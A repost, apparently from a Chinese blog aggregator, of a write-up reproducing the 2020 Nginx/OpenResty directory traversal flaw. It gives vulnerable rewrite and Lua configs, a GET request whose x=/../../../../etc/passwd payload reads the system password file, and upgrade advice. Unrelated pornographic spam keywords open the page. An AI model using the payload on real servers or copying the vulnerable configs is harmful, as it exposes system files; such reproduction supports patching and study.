国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Nginx/OpenResty目錄穿越漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了Nginx/OpenResty目錄穿越漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

Nginx/OpenResty目錄穿越漏洞復(fù)現(xiàn)

漏洞背景:

2020年03月18日, 360CERT監(jiān)測(cè)發(fā)現(xiàn) openwall oss-security 郵件組披露了兩枚漏洞。在特定配置下 nginx/openresty 存在 內(nèi)存泄漏漏洞/目錄穿越漏洞。

Nginx 是異步框架的網(wǎng)頁服務(wù)器,也可以用作反向代理、負(fù)載平衡器和HTTP緩存。

OpenResty是一個(gè)基于nginx的Web平臺(tái),它對(duì)nginx增加LuaJIT引擎使其運(yùn)行Lua腳本。

影響版本:

nginx <= v1.17.7 (commit af8ea176a743e97d767b3e1439d549b52dd0367a)

openresty <= v1.15.8.2

環(huán)境復(fù)現(xiàn):

操作系統(tǒng)centos7。
????????安裝 nginx 版本選擇了 1.17.7
????????修改 rewrite 配置

//directory traversal
location ~ /rewrite {
   rewrite ^.*$ $arg_x;
}

帶著 payload 請(qǐng)求 /rewrite 目錄?讀取passwd文件下的密碼

GET /rewrite?x=/../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

返回響應(yīng)后的內(nèi)容。

Nginx/OpenResty目錄穿越漏洞復(fù)現(xiàn)

?在 openresty v1.15.8.2 測(cè)試,同樣可以復(fù)現(xiàn)

環(huán)境搭建:

采用剛搭建的 nginx 1.17.7,安裝 lua-nginx-module,需要重新編譯nginx,安裝編譯過程可參見:地址
配置nginx.conf

//memleak
location ~ /memleak {
    rewrite_by_lua_block {
        ngx.req.read_body();
        local args, err = ngx.req.get_post_args();
        ngx.req.set_uri( args["url"], true );
    }
}

這里采用openresty v1.15.8.2 版本,成功復(fù)現(xiàn)(lua-nginx-module-0.10.15 以上版本會(huì)報(bào)錯(cuò)

Nginx/OpenResty目錄穿越漏洞復(fù)現(xiàn)

打碼處為回顯。

修復(fù)建議:

建議用戶關(guān)注并依據(jù)實(shí)際業(yè)務(wù)評(píng)估漏洞風(fēng)險(xiǎn)影響,可通過如下方案進(jìn)行加固修復(fù),避免安全風(fēng)險(xiǎn);

nginx :升級(jí)版本至 v1.17.9 或應(yīng)用 commit a5895eb502747f396d3901a948834cd87d5fb0c3;

openresty :排查配置文件中 rewrite 以及 ngx.req.set_uri ,建議臨時(shí)禁用相關(guān)配置。文章來源地址http://www.zghlxwxcb.cn/news/detail-409734.html

到了這里,關(guān)于Nginx/OpenResty目錄穿越漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

    【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

    1. 漏洞簡(jiǎn)介 Ruby on Rails使用了指定參數(shù)的render file來渲染應(yīng)用之外的視圖,且會(huì)根據(jù)用戶傳入的Accept頭來確定文件具體位置。我們可以通過修改訪問某控制器的請(qǐng)求包,通過…/…/…/…/來達(dá)到路徑穿越的目的,然后再通過{{來閉合模板查詢路徑,那我們?cè)L問的文件會(huì)被當(dāng)做外部

    2024年02月04日
    瀏覽(31)
  • 【漏洞復(fù)現(xiàn)】Apache_HTTP_2.4.50_路徑穿越漏洞(CVE-2021-42013)

    【漏洞復(fù)現(xiàn)】Apache_HTTP_2.4.50_路徑穿越漏洞(CVE-2021-42013)

    感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī) 說明 內(nèi)容 漏洞編號(hào) CVE-2021-42013 漏洞名稱 Apache HTTP_2.4.50_路徑穿越漏洞 漏洞評(píng)級(jí) 高危 影響范圍 2.4.49 2.4.50 漏洞描述 CVE-2021-42013是由CVE-2021-41773的不完整修復(fù)導(dǎo)致的漏洞,攻擊者可以使用路徑遍歷攻擊將

    2024年02月05日
    瀏覽(18)
  • 目錄穿越/遍歷漏洞及對(duì)其防御方法的繞過

    目錄穿越/遍歷漏洞及對(duì)其防御方法的繞過

    ? 目錄穿越(目錄遍歷)是一個(gè)Web安全漏洞,攻擊者可以利用該漏洞讀取運(yùn)行應(yīng)用程序的服務(wù)器上的任意文件。 這可能包括應(yīng)用程序代碼和數(shù)據(jù),后端系統(tǒng)的登錄信息以及敏感的操作系統(tǒng)文件。目錄穿越不僅可以訪問服務(wù)器中的任何目錄,還可以訪問服務(wù)器中任何文件的內(nèi)

    2024年02月11日
    瀏覽(24)
  • 騰訊云coding平臺(tái)平臺(tái)inda目錄遍歷漏洞復(fù)現(xiàn)

    騰訊云coding平臺(tái)平臺(tái)inda目錄遍歷漏洞復(fù)現(xiàn)

    其實(shí)就是一個(gè)python的庫可以遍歷到,并不能遍歷到別的路徑下,后續(xù)可利用性不大,并且目前這個(gè)平臺(tái)私有部署量不多,大多都是用騰訊云在線部署的。 CODING DevOps 是面向軟件研發(fā)團(tuán)隊(duì)的一站式研發(fā)協(xié)作管理平臺(tái),提供從需求到設(shè)計(jì)、開發(fā)、構(gòu)建、測(cè)試、發(fā)布到部署的全流程

    2024年02月11日
    瀏覽(37)
  • Nginx 配置錯(cuò)誤漏洞復(fù)現(xiàn)

    1、CRLF注入漏洞 描述 CRLF是”回車 + 換

    2024年02月13日
    瀏覽(16)
  • Nginx 解析漏洞復(fù)現(xiàn)

    Nginx 解析漏洞復(fù)現(xiàn)

    如下介紹kali搭建的教程 docker-compose ps 使用這條命令查看當(dāng)前正在運(yùn)行的環(huán)境 訪問http://you-ip/ 該漏洞與Nginx、php版本無關(guān),屬于用戶配

    2024年02月16日
    瀏覽(16)
  • Apache nginx解析漏洞復(fù)現(xiàn)

    Apache nginx解析漏洞復(fù)現(xiàn)

    將nginx解壓后放到c盤根目錄下: 運(yùn)行startup.bat啟動(dòng)環(huán)境: 在HTML文件夾下有它的主頁文件: nginx在遇到后綴名有php的文件時(shí),會(huì)將該文件給php解釋器處理,在讀取文件時(shí)如果遇到00時(shí)就讀取結(jié)束

    2024年02月09日
    瀏覽(21)
  • docker復(fù)現(xiàn)Nginx配置漏洞

    docker復(fù)現(xiàn)Nginx配置漏洞

    目錄 1.docker環(huán)境搭建 2.復(fù)現(xiàn)過程 2.1CRLF(carriage return/line feed)注入漏洞 ?2.2.目錄穿越 ?2.3.add_header覆蓋 1.安裝docker 2.下載并解壓docker環(huán)境Nginx配置漏洞安裝包 鏈接:https://pan.baidu.com/s/1gL4_ZUbY5mA-qo6sG5-yWQ?pwd=s6l9? 提取碼:s6l9 cd到對(duì)應(yīng)目錄下,docker啟容器 安裝好后,用docker ps -a查看

    2024年02月13日
    瀏覽(16)
  • docker復(fù)現(xiàn)nginx錯(cuò)誤配置漏洞

    docker復(fù)現(xiàn)nginx錯(cuò)誤配置漏洞

    目錄 一、nginx環(huán)境搭建 1.1搭建步驟 ?二、docker復(fù)現(xiàn)Nginx配置漏洞 ?2.1安裝docker ?2.2復(fù)現(xiàn)過程 2.1CRLF(carriage return/line feed)注入漏洞 ?2.2.目錄穿越 1.先創(chuàng)建 Nginx 的目錄并進(jìn)入(命令如下) 2.下載 Nginx 的安裝包,可以通過 FTP 工具上傳離線環(huán)境包,也可通過 wget 命令在線獲取安裝包

    2024年02月13日
    瀏覽(22)
  • 【Nginx】nginx目錄遍歷漏洞

    除了X-Forwarded-For偽造客戶端IP漏洞,發(fā)現(xiàn)還要修改關(guān)于目錄遍歷的漏洞,這里簡(jiǎn)單記錄一下。 Nginx 目錄遍歷(Nginx Directory Traversal)是一種安全漏洞,通常會(huì)影響 Nginx 服務(wù)器上的 Web 應(yīng)用程序。該漏洞允許攻擊者通過利用應(yīng)用程序代碼中的錯(cuò)誤配置或代碼漏洞,來訪問系統(tǒng)中未

    2024年02月13日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包